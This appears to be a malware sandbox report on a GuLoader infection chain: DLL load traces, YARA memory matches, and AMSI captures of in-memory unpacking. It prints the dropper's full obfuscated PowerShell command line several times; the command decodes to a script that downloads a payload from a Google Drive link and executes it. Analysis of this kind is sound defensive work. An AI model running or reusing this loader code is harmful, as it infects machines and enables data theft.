Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: slc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: ore.pdb source: powershell.exe, 00000007.00000002.2578303091.00000000082D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2578303091.00000000082D0000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("POWERSHELL.exe", ""$Riffelgange = 1;$Authorish='Substrin'", "", "", "0");
Yara detected GuLoader
Source: Yara match File source: 00000009.00000002.3278956404.0000000007365000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2579172853.000000000C025000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2572686483.00000000059B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2578916725.00000000085F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2942945182.0000026D56CF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Hinkes171)$global:Sauries = [System.Text.Encoding]::ASCII.GetString($Ophidselsens)$global:Nonclarification=$Sauries.substring(290697,29450)<#Dolomitizations Babblesome Polybutene Ind
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Iliosciatic $Udfrselstilladelsernes $Unshrewd), (Hugormes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Zardmmerne = [AppDomain]::CurrentDomain.GetAssemb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Dknavnes)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Konomiserende, $false).DefineType($Lifestyle, $S
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Hinkes171)$global:Sauries = [System.Text.Encoding]::ASCII.GetString($Ophidselsens)$global:Nonclarification=$Sauries.substring(290697,29450)<#Dolomitizations Babblesome Polybutene Ind
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Riffelgange = 1;$Authorish='Substrin';$Authorish+='g';Function Shockhead($Kaputt){$Spisefrikvarterernes=$Kaputt.Length-$Riffelgange;For($Ratihabumr=5; $Ratihabumr -lt $Spisefrikvarterernes; $Ratihabumr+=(6)){$Udsagnsleddenes+=$Kaputt.$Authorish.Invoke($Ratihabumr, $Riffelgange);}$Udsagnsleddenes;}function sabotage($Velal){& ($Tanquelinian) ($Velal);}$Greenheart=Shockhead 'OutraMIndowoAigrezBestoiSkspolMusikl ,utsa Brne/Gr.nd5.itin.Afdel0Up,ai Zw ng(SynapWNjereiCoresnD,agsdTosdeoHerrgwkroe sbil,e .runeNStrafTPraec Forma1Myoli0The,m. Bort0Opfi,;Enkel Arch,WIrradiObsern Kyst6.odra4Banju; eval For axUdban6Czare4Spat ;under TayerrUnd,iv tred:M.ckb1Jacqu2Maime1 Seri.Deesk0Allop) Brad BeregGHemodeSalewc DiskkRandmoVolit/ Qu z2 Kruk0Fo.nu1Ordfo0 enio0,anlo1jetst0Invas1Gaska Knif.FS criiRgerirGillyeStridf Toitovexdex.nnek/Gener1Orke.2minst1Bo.it. ,eha0Dia,o ';$Feline=Shockhead 'StripUOverts PoliegalehrOsobe-ForaaASkinkgOmgiveEnwinnSanc tJinri ';$ostler=Shockhead 'goo,whKvikkt Nikot ousp udstsNemme:Ha dw/Tjles/GorvadAntiprChivei Sie.vKontreDansk.FellygPrivaoP eezoViolig B,dflAmpeleO var.IsospcSubtroMowbumJacke/Tilbau VictcOpsge?RibboeTurp.xI,prgpTelevoHofchrhavait pakk= NurtdbearloTrevewPutnanFu,ill.resuoextena SpirdSe vi& SundiHistodManja= Allo1FrugthEncheJ estyNymphvNucl gappasAA ninV U.pebPoachPUgtetJJol,e7 .eww5Lob.tW TyphNEndomnAnalyYharmem AliqHadvenv Al ypTurnuQGenerDKropskNy.tiE.nobs9 WindK BeunTMon sfapoloZDisozPSnesksAfvaekInte ';$Olympier=Shockhead 'Det r>R dio ';$Tanquelinian=Shockhead 'Succei,nackeFascixCiv l ';$Aminobenzamide = Shockhead 'PreloeForcec FilihGuelpoNone. B cki%B,ahmainterpInserpBrunldUd rmaAnd.lt KarbaAquar% Bri.\ kattPBlodrrIndhoe MonahNav,ea,egiststr,irmocame B lldAfsky.Unc.vFDomsfiJav.ldRevi Oc.i&Stnne&Chrys Skrine OvercHendehMelleoDm,ni Tritu$ sept ';sabotage (Shockhead 'Bigba$Storhg R,tilTrim oUnadvb DissaSamm.lCr,nk: CecoAForemaKi,kenUnfledSportePsychlToledyBramsdTan eeNrga nSmaafs Exce=rotte(T.skncB dummvalerdDelib Demat/InaudcBiogr Fa el$WretcAnormam ForsiEnneanmidnio ColebUnexteKlonen undsz SkumaBevilmTvrf i DestdFlexueB,lim)Adnot ');sabotage (Shockhead 'Form.$WienegPal.nlAlleyoballobEnedia BlgelStyre:ExpouUSchoon,mbets EngahLydliu Hel.nK.tukn.kraleUn.erdAlcoh=Overf$,iurooNaticsK,loltDimpll S,mieDann rforgl.Oplgns ominp DubblafgrsiGangat alsr(U orb$musheOGl.cilOrdney nordmTeorip iploi,ympae HeltrBeta )Fresn ');$ostler=$Unshunned[0];sabotage (Shockhead 'Super$Ups agHeterlPal.to Smelb Br.aaParanl mikr:SloucMHasareWhalesFrdigsPentaa Gen.nEvitisVirag=RadioNAitche G,unwPeete-Prea,Odykkeb Ma sj.verbeH kkecAnl,st Phy. UdbarS,eceny,emuns FiprtMelame Klipmalkef..vnbyN UrokeSaltatEndur.samarWStavneAp,erbDikotCUnderl TrokiInj reStudenStrimtDowse ');sabotage (Shockhead 'Rigni$A ticMEjende Be nslichestraneaTono,nGgesnsGerma.,etalHW.noneThereabeford emme strorPhi.os klo,[Joint$biskuFforbieShor.l Yletimock
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Riffelgange = 1;$Authorish='Substrin';$Authorish+='g';Function Shockhead($Kaputt){$Spisefrikvarterernes=$Kaputt.Length-$Riffelgange;For($Ratihabumr=5; $Ratihabumr -lt $Spisefrikvarterernes; $Ratihabumr+=(6)){$Udsagnsleddenes+=$Kaputt.$Authorish.Invoke($Ratihabumr, $Riffelgange);}$Udsagnsleddenes;}function sabotage($Velal){& ($Tanquelinian) ($Velal);}$Greenheart=Shockhead 'OutraMIndowoAigrezBestoiSkspolMusikl ,utsa Brne/Gr.nd5.itin.Afdel0Up,ai Zw ng(SynapWNjereiCoresnD,agsdTosdeoHerrgwkroe sbil,e .runeNStrafTPraec Forma1Myoli0The,m. Bort0Opfi,;Enkel Arch,WIrradiObsern Kyst6.odra4Banju; eval For axUdban6Czare4Spat ;under TayerrUnd,iv tred:M.ckb1Jacqu2Maime1 Seri.Deesk0Allop) Brad BeregGHemodeSalewc DiskkRandmoVolit/ Qu z2 Kruk0Fo.nu1Ordfo0 enio0,anlo1jetst0Invas1Gaska Knif.FS criiRgerirGillyeStridf Toitovexdex.nnek/Gener1Orke.2minst1Bo.it. ,eha0Dia,o ';$Feline=Shockhead 'StripUOverts PoliegalehrOsobe-ForaaASkinkgOmgiveEnwinnSanc tJinri ';$ostler=Shockhead 'goo,whKvikkt Nikot ousp udstsNemme:Ha dw/Tjles/GorvadAntiprChivei Sie.vKontreDansk.FellygPrivaoP eezoViolig B,dflAmpeleO var.IsospcSubtroMowbumJacke/Tilbau VictcOpsge?RibboeTurp.xI,prgpTelevoHofchrhavait pakk= NurtdbearloTrevewPutnanFu,ill.resuoextena SpirdSe vi& SundiHistodManja= Allo1FrugthEncheJ estyNymphvNucl gappasAA ninV U.pebPoachPUgtetJJol,e7 .eww5Lob.tW TyphNEndomnAnalyYharmem AliqHadvenv Al ypTurnuQGenerDKropskNy.tiE.nobs9 WindK BeunTMon sfapoloZDisozPSnesksAfvaekInte ';$Olympier=Shockhead 'Det r>R dio ';$Tanquelinian=Shockhead 'Succei,nackeFascixCiv l ';$Aminobenzamide = Shockhead 'PreloeForcec FilihGuelpoNone. B cki%B,ahmainterpInserpBrunldUd rmaAnd.lt KarbaAquar% Bri.\ kattPBlodrrIndhoe MonahNav,ea,egiststr,irmocame B lldAfsky.Unc.vFDomsfiJav.ldRevi Oc.i&Stnne&Chrys Skrine OvercHendehMelleoDm,ni Tritu$ sept ';sabotage (Shockhead 'Bigba$Storhg R,tilTrim oUnadvb DissaSamm.lCr,nk: CecoAForemaKi,kenUnfledSportePsychlToledyBramsdTan eeNrga nSmaafs Exce=rotte(T.skncB dummvalerdDelib Demat/InaudcBiogr Fa el$WretcAnormam ForsiEnneanmidnio ColebUnexteKlonen undsz SkumaBevilmTvrf i DestdFlexueB,lim)Adnot ');sabotage (Shockhead 'Form.$WienegPal.nlAlleyoballobEnedia BlgelStyre:ExpouUSchoon,mbets EngahLydliu Hel.nK.tukn.kraleUn.erdAlcoh=Overf$,iurooNaticsK,loltDimpll S,mieDann rforgl.Oplgns ominp DubblafgrsiGangat alsr(U orb$musheOGl.cilOrdney nordmTeorip iploi,ympae HeltrBeta )Fresn ');$ostler=$Unshunned[0];sabotage (Shockhead 'Super$Ups agHeterlPal.to Smelb Br.aaParanl mikr:SloucMHasareWhalesFrdigsPentaa Gen.nEvitisVirag=RadioNAitche G,unwPeete-Prea,Odykkeb Ma sj.verbeH kkecAnl,st Phy. UdbarS,eceny,emuns FiprtMelame Klipmalkef..vnbyN UrokeSaltatEndur.samarWStavneAp,erbDikotCUnderl TrokiInj reStudenStrimtDowse ');sabotage (Shockhead 'Rigni$A ticMEjende Be nslichestraneaTono,nGgesnsGerma.,etalHW.noneThereabeford emme strorPhi.os klo,[Joint$biskuFforbieShor.l Yletimock
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Riffelgange = 1;$Authorish='Substrin';$Authorish+='g';Function Shockhead($Kaputt){$Spisefrikvarterernes=$Kaputt.Length-$Riffelgange;For($Ratihabumr=5; $Ratihabumr -lt $Spisefrikvarterernes; $Ratihabumr+=(6)){$Udsagnsleddenes+=$Kaputt.$Authorish.Invoke($Ratihabumr, $Riffelgange);}$Udsagnsleddenes;}function sabotage($Velal){& ($Tanquelinian) ($Velal);}$Greenheart=Shockhead 'OutraMIndowoAigrezBestoiSkspolMusikl ,utsa Brne/Gr.nd5.itin.Afdel0Up,ai Zw ng(SynapWNjereiCoresnD,agsdTosdeoHerrgwkroe sbil,e .runeNStrafTPraec Forma1Myoli0The,m. Bort0Opfi,;Enkel Arch,WIrradiObsern Kyst6.odra4Banju; eval For axUdban6Czare4Spat ;under TayerrUnd,iv tred:M.ckb1Jacqu2Maime1 Seri.Deesk0Allop) Brad BeregGHemodeSalewc DiskkRandmoVolit/ Qu z2 Kruk0Fo.nu1Ordfo0 enio0,anlo1jetst0Invas1Gaska Knif.FS criiRgerirGillyeStridf Toitovexdex.nnek/Gener1Orke.2minst1Bo.it. ,eha0Dia,o ';$Feline=Shockhead 'StripUOverts PoliegalehrOsobe-ForaaASkinkgOmgiveEnwinnSanc tJinri ';$ostler=Shockhead 'goo,whKvikkt Nikot ousp udstsNemme:Ha dw/Tjles/GorvadAntiprChivei Sie.vKontreDansk.FellygPrivaoP eezoViolig B,dflAmpeleO var.IsospcSubtroMowbumJacke/Tilbau VictcOpsge?RibboeTurp.xI,prgpTelevoHofchrhavait pakk= NurtdbearloTrevewPutnanFu,ill.resuoextena SpirdSe vi& SundiHistodManja= Allo1FrugthEncheJ estyNymphvNucl gappasAA ninV U.pebPoachPUgtetJJol,e7 .eww5Lob.tW TyphNEndomnAnalyYharmem AliqHadvenv Al ypTurnuQGenerDKropskNy.tiE.nobs9 WindK BeunTMon sfapoloZDisozPSnesksAfvaekInte ';$Olympier=Shockhead 'Det r>R dio ';$Tanquelinian=Shockhead 'Succei,nackeFascixCiv l ';$Aminobenzamide = Shockhead 'PreloeForcec FilihGuelpoNone. B cki%B,ahmainterpInserpBrunldUd rmaAnd.lt KarbaAquar% Bri.\ kattPBlodrrIndhoe MonahNav,ea,egiststr,irmocame B lldAfsky.Unc.vFDomsfiJav.ldRevi Oc.i&Stnne&Chrys Skrine OvercHendehMelleoDm,ni Tritu$ sept ';sabotage (Shockhead 'Bigba$Storhg R,tilTrim oUnadvb DissaSamm.lCr,nk: CecoAForemaKi,kenUnfledSportePsychlToledyBramsdTan eeNrga nSmaafs Exce=rotte(T.skncB dummvalerdDelib Demat/InaudcBiogr Fa el$WretcAnormam ForsiEnneanmidnio ColebUnexteKlonen undsz SkumaBevilmTvrf i DestdFlexueB,lim)Adnot ');sabotage (Shockhead 'Form.$WienegPal.nlAlleyoballobEnedia BlgelStyre:ExpouUSchoon,mbets EngahLydliu Hel.nK.tukn.kraleUn.erdAlcoh=Overf$,iurooNaticsK,loltDimpll S,mieDann rforgl.Oplgns ominp DubblafgrsiGangat alsr(U orb$musheOGl.cilOrdney nordmTeorip iploi,ympae HeltrBeta )Fresn ');$ostler=$Unshunned[0];sabotage (Shockhead 'Super$Ups agHeterlPal.to Smelb Br.aaParanl mikr:SloucMHasareWhalesFrdigsPentaa Gen.nEvitisVirag=RadioNAitche G,unwPeete-Prea,Odykkeb Ma sj.verbeH kkecAnl,st Phy. UdbarS,eceny,emuns FiprtMelame Klipmalkef..vnbyN UrokeSaltatEndur.samarWStavneAp,erbDikotCUnderl TrokiInj reStudenStrimtDowse ');sabotage (Shockhead 'Rigni$A ticMEjende Be nslichestraneaTono,nGgesnsGerma.,etalHW.noneThereabeford emme strorPhi.os klo,[Joint$biskuFforbieShor.l Yletimock Jump to behavior
